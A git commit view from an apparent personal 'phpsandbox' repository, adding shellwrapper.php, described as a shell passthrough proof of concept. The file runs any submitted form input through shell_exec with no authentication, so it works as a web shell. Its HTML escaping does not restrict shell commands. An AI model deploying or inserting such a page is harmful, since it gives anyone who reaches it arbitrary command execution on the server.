diff options
| author | Kyle K <kylek389@gmail.com> | 2014-12-17 18:46:12 -0600 |
|---|---|---|
| committer | Kyle K <kylek389@gmail.com> | 2014-12-17 18:46:12 -0600 |
| commit | 78c1bab624440aa6a0576c82696f08c99001fd70 (patch) | |
| tree | 9c9bf45c3fb2cb8d9d03dde45435d41b179e7a72 /shellwrapper.php | |
| parent | c815b1b4c2b3f05edfa17e9837476da15f902ccd (diff) | |
| download | phpsandbox-78c1bab624440aa6a0576c82696f08c99001fd70.tar.gz phpsandbox-78c1bab624440aa6a0576c82696f08c99001fd70.tar.bz2 phpsandbox-78c1bab624440aa6a0576c82696f08c99001fd70.zip | |
add a shell php passthrough tool PoC
Diffstat (limited to 'shellwrapper.php')
| -rw-r--r-- | shellwrapper.php | 20 |
1 files changed, 20 insertions, 0 deletions
diff --git a/shellwrapper.php b/shellwrapper.php new file mode 100644 index 0000000..cf14c20 --- /dev/null +++ b/shellwrapper.php @@ -0,0 +1,20 @@ +<?php + +if (!empty($_POST)) { + $command = htmlspecialchars($_POST['command']); + $output = shell_exec($command); + echo "<pre>$output</pre>"; +} + +?> + +<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post"> + <div style="display: inline;"> + <p>enter your command below</p> + <label for="command">$:</label> + <input type="text" id="command" name="command" /> <!-- name attr is needed otherwise $_POST would be empty --> + </div> + <div style="display: inline;"> + <input type="submit" value="Execute" /> + </div> +</form> |